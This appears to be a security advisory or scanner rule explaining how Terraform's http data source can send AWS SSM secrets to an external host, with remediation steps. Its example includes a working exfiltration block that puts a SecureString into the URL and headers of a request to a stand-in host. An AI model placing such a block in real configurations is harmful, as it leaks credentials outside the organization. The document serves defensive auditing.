
HTTP data block can be used to leak secrets or variables outside of the organization

Severity: CRITICAL
Exploitability: HIGH
Providers: AWS
Categories: SECRET

Description

The data.http block (Terraform's http data source) can be used to send any value from the configuration to an arbitrary external URL: whatever is interpolated into its url, request_headers or request_body attributes is transmitted to the remote host when the data source is read.

In particular, the value of an aws_ssm_parameter resource (typically a SecureString holding a credential) can be interpolated into the URL or headers of the data.http request, which delivers the plaintext secret to that host.

When credentials are exfiltrated this way the finding is critical: the secret leaves the organization in plaintext, is recorded in the receiving server's access logs and in any proxy or CI logs that capture outbound requests, and the request attributes (url, headers, response) are also written to the Terraform state file.

Once the block is in place and the URL points at an attacker-controlled host, no AWS privileges and no user interaction are required to exploit it: every terraform plan or apply that evaluates the data source, including automated CI runs, sends the value again. The leak continues until the block is removed and the credential is rotated.
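As an added illustration (not part of the original rule page, and not taken from any real module), the following shows the exfiltration pattern the rule describes and the remediated form. The resource names, parameter path, variable and external URLs are all hypothetical.

```hcl
# --- before: the vulnerable pattern (hypothetical names; do not deploy) ---

variable "db_password" {
  type      = string
  sensitive = true
}

# The credential is stored in SSM as a SecureString.
resource "aws_ssm_parameter" "db_password" {
  name  = "/prod/db/password"   # hypothetical parameter path
  type  = "SecureString"
  value = var.db_password
}

# Any reference to aws_ssm_parameter.db_password.value inside this block
# sends the plaintext secret to whoever operates telemetry.example.net
# (hypothetical host). Terraform reads data sources during plan, so a
# CI plan is enough to trigger the request; no AWS privileges are needed.
data "http" "exfil" {
  # Channel 1: the query string, which lands in the remote access log.
  url = "https://telemetry.example.net/ping?v=${aws_ssm_parameter.db_password.value}"

  # Channel 2: request headers carry the same value just as easily.
  request_headers = {
    "X-Trace" = aws_ssm_parameter.db_password.value
  }
}

# --- after: remediated ---
# The variable and aws_ssm_parameter resource stay as above; the
# data "http" "exfil" block is deleted outright. If an external lookup is
# genuinely required, it may remain only when nothing it sends is derived
# from a secret: a constant URL and no secret-bearing headers or body.
data "http" "release_manifest" {
  url = "https://releases.example.net/latest.json"   # hypothetical public URL
}
```

A quick audit is to search the configuration and every vendored module for data "http" blocks and review each interpolation in url, request_headers and request_body for references to aws_ssm_parameter, aws_secretsmanager_secret_version, random_password or variables marked sensitive. Note that Terraform may print the derived url as (sensitive value) in plan output; that masking only affects what is displayed, the provider still receives the real value and still sends the request. After removing the block, rotate the parameter (for example with aws ssm put-parameter using --overwrite) and purge the old value from state history.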

Impact

Potential data exposure: True
Visible in logs: True
User interaction required: False
Privileges required: False

Once credentials have been exposed, an attacker can use them to gain persistent access to the resources they protect and, from there, to the wider organization.

Remediation guidelines

  • Revoke and rotate all potentially exposed credentials; treat them as compromised even if no misuse has been observed.
  • Remove the data.http block if possible. If an external HTTP lookup is genuinely required, make sure no value derived from a secret reaches its url, request_headers or request_body.
  • If this configuration comes from a third-party module, stop using it immediately and find a "Verified" alternative.
